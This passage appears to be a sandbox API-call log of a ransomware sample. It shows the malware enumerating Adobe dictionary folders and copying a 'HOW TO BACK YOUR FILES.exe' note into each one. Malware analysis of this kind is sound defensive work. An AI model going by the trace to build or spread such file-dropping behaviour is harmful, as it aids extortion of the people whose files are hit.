lpString2="aoldtz.exe") returned -1 [0110.771] lstrcpyW (in: lpString1=0x2cce49c, lpString2="Adobe Custom Dictionary" | out: lpString1="Adobe Custom Dictionary") returned="Adobe Custom Dictionary" [0110.771] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79a8 [0110.771] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xcc) returned 0x2d40a8 [0110.771] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79b0 | out: ListHead=0x2e7710, ListEntry=0x2e79b0) returned 0x2e7990 [0110.771] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x50d068e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x50d068e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0110.771] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0110.771] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x50d068e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x50d068e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0110.771] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0110.771] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e79b0 [0110.771] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary" [0110.772] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary" [0110.772] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.772] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.772] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.773] GetLastError () returned 0x0 [0110.773] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.773] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.773] CloseHandle (hObject=0x120) returned 1 [0110.773] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.773] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x50d2ca40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50d2ca40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.773] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.773] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0110.774] lstrcpyW (in: lpString1=0x2cce4cc, lpString2="all" | out: lpString1="all") returned="all" [0110.774] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79a8 [0110.774] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xd4) returned 0x2c8eb8 [0110.774] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79b0 | out: ListHead=0x2e7710, ListEntry=0x2e79b0) returned 0x2e7990 [0110.774] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x50d9ee60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50d9ee60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="brt", cAlternateFileName="")) returned 1 [0110.774] lstrcmpiW (lpString1="brt", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.774] lstrcmpiW (lpString1="brt", lpString2="aoldtz.exe") returned 1 [0110.774] lstrcpyW (in: lpString1=0x2cce4cc, lpString2="brt" | out: lpString1="brt") returned="brt" [0110.774] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79c8 [0110.774] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xd4) returned 0x2d6cf0 [0110.774] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79d0 | out: ListHead=0x2e7710, ListEntry=0x2e79d0) returned 0x2e79b0 [0110.774] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x50d9ee60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50d9ee60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="brz", cAlternateFileName="")) returned 1 [0110.774] lstrcmpiW (lpString1="brz", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.774] lstrcmpiW (lpString1="brz", lpString2="aoldtz.exe") returned 1 [0110.774] lstrcpyW (in: lpString1=0x2cce4cc, lpString2="brz" | out: lpString1="brz") returned="brz" [0110.774] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ba8 [0110.774] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xd4) returned 0x2d6dd0 [0110.774] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bb0 | out: ListHead=0x2e7710, ListEntry=0x2e7bb0) returned 0x2e79d0 [0110.774] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x50d78d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50d78d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dan", cAlternateFileName="")) returned 1 [0110.774] lstrcmpiW (lpString1="dan", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.774] lstrcmpiW (lpString1="dan", lpString2="aoldtz.exe") returned 1 [0110.775] lstrcpyW (in: lpString1=0x2cce4cc, lpString2="dan" | out: lpString1="dan") returned="dan" [0110.775] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7aa8 [0110.775] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xd4) returned 0x2ca068 [0110.775] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ab0 | out: ListHead=0x2e7710, ListEntry=0x2e7ab0) returned 0x2e7bb0 [0110.775] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x50d78d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50d78d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dut", cAlternateFileName="")) returned 1 [0110.775] lstrcmpiW (lpString1="dut", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.775] lstrcmpiW (lpString1="dut", lpString2="aoldtz.exe") returned 1 [0110.775] lstrcpyW (in: lpString1=0x2cce4cc, lpString2="dut" | out: lpString1="dut") returned="dut" [0110.775] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ac8 [0110.775] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xd4) returned 0x2ca148 [0110.775] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ad0 | out: ListHead=0x2e7710, ListEntry=0x2e7ad0) returned 0x2e7ab0 [0110.775] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x50d78d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50d78d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eng", cAlternateFileName="")) returned 1 [0110.775] lstrcmpiW (lpString1="eng", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.775] lstrcmpiW (lpString1="eng", lpString2="aoldtz.exe") returned 1 [0110.775] lstrcpyW (in: lpString1=0x2cce4cc, lpString2="eng" | out: lpString1="eng") returned="eng" [0110.775] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ae8 [0110.775] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xd4) returned 0x2cc760 [0110.775] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7af0 | out: ListHead=0x2e7710, ListEntry=0x2e7af0) returned 0x2e7ad0 [0110.775] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x50d78d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50d78d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="frn", cAlternateFileName="")) returned 1 [0110.775] lstrcmpiW (lpString1="frn", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.775] lstrcmpiW (lpString1="frn", lpString2="aoldtz.exe") returned 1 [0110.776] lstrcpyW (in: lpString1=0x2cce4cc, lpString2="frn" | out: lpString1="frn") returned="frn" [0110.776] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b08 [0110.776] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xd4) returned 0x2cc840 [0110.776] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b10 | out: ListHead=0x2e7710, ListEntry=0x2e7b10) returned 0x2e7af0 [0110.776] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x50d78d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50d78d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="grm", cAlternateFileName="")) returned 1 [0110.776] lstrcmpiW (lpString1="grm", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.776] lstrcmpiW (lpString1="grm", lpString2="aoldtz.exe") returned 1 [0110.776] lstrcpyW (in: lpString1=0x2cce4cc, lpString2="grm" | out: lpString1="grm") returned="grm" [0110.776] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b48 [0110.776] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xd4) returned 0x2d5ee0 [0110.776] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b50 | out: ListHead=0x2e7710, ListEntry=0x2e7b50) returned 0x2e7b10 [0110.776] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x50d2ca40, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x50d2ca40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0110.776] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0110.776] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x50d52ba0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50d52ba0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="itl", cAlternateFileName="")) returned 1 [0110.776] lstrcmpiW (lpString1="itl", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0110.776] lstrcmpiW (lpString1="itl", lpString2="aoldtz.exe") returned 1 [0110.776] lstrcpyW (in: lpString1=0x2cce4cc, lpString2="itl" | out: lpString1="itl") returned="itl" [0110.776] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0110.776] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xd4) returned 0x2d5fc0 [0110.776] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0110.776] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x50d52ba0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50d52ba0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nrw", cAlternateFileName="")) returned 1 [0110.777] lstrcmpiW (lpString1="nrw", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0110.777] lstrcmpiW (lpString1="nrw", lpString2="aoldtz.exe") returned 1 [0110.777] lstrcpyW (in: lpString1=0x2cce4cc, lpString2="nrw" | out: lpString1="nrw") returned="nrw" [0110.777] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0110.777] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xd4) returned 0x2cb310 [0110.777] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7b70 [0110.777] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x50d52ba0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50d52ba0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="prt", cAlternateFileName="")) returned 1 [0110.777] lstrcmpiW (lpString1="prt", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0110.777] lstrcmpiW (lpString1="prt", lpString2="aoldtz.exe") returned 1 [0110.777] lstrcpyW (in: lpString1=0x2cce4cc, lpString2="prt" | out: lpString1="prt") returned="prt" [0110.777] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0110.777] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xd4) returned 0x2cb3f0 [0110.777] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cb0 | out: ListHead=0x2e7710, ListEntry=0x2e7cb0) returned 0x2e7bd0 [0110.777] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x50d2ca40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50d2ca40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="spn", cAlternateFileName="")) returned 1 [0110.777] lstrcmpiW (lpString1="spn", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0110.777] lstrcmpiW (lpString1="spn", lpString2="aoldtz.exe") returned 1 [0110.777] lstrcpyW (in: lpString1=0x2cce4cc, lpString2="spn" | out: lpString1="spn") returned="spn" [0110.777] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0110.777] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xd4) returned 0x2ca4e8 [0110.777] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7cb0 [0110.777] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x50d2ca40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50d2ca40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="swd", cAlternateFileName="")) returned 1 [0110.777] lstrcmpiW (lpString1="swd", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0110.778] lstrcmpiW (lpString1="swd", lpString2="aoldtz.exe") returned 1 [0110.778] lstrcpyW (in: lpString1=0x2cce4cc, lpString2="swd" | out: lpString1="swd") returned="swd" [0110.778] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c28 [0110.778] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xd4) returned 0x2ca5c8 [0110.778] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c30 | out: ListHead=0x2e7710, ListEntry=0x2e7c30) returned 0x2e7b90 [0110.778] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x50d2ca40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50d2ca40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="swd", cAlternateFileName="")) returned 0 [0110.778] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0110.778] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c30 [0110.778] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd" [0110.778] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd" [0110.778] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.778] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\swd\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.779] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.779] GetLastError () returned 0x0 [0110.779] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.779] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.779] CloseHandle (hObject=0x120) returned 1 [0110.780] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.780] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x50d2ca40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50d2ca40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.780] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.780] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0110.780] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn" [0110.780] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn" [0110.780] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.780] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS 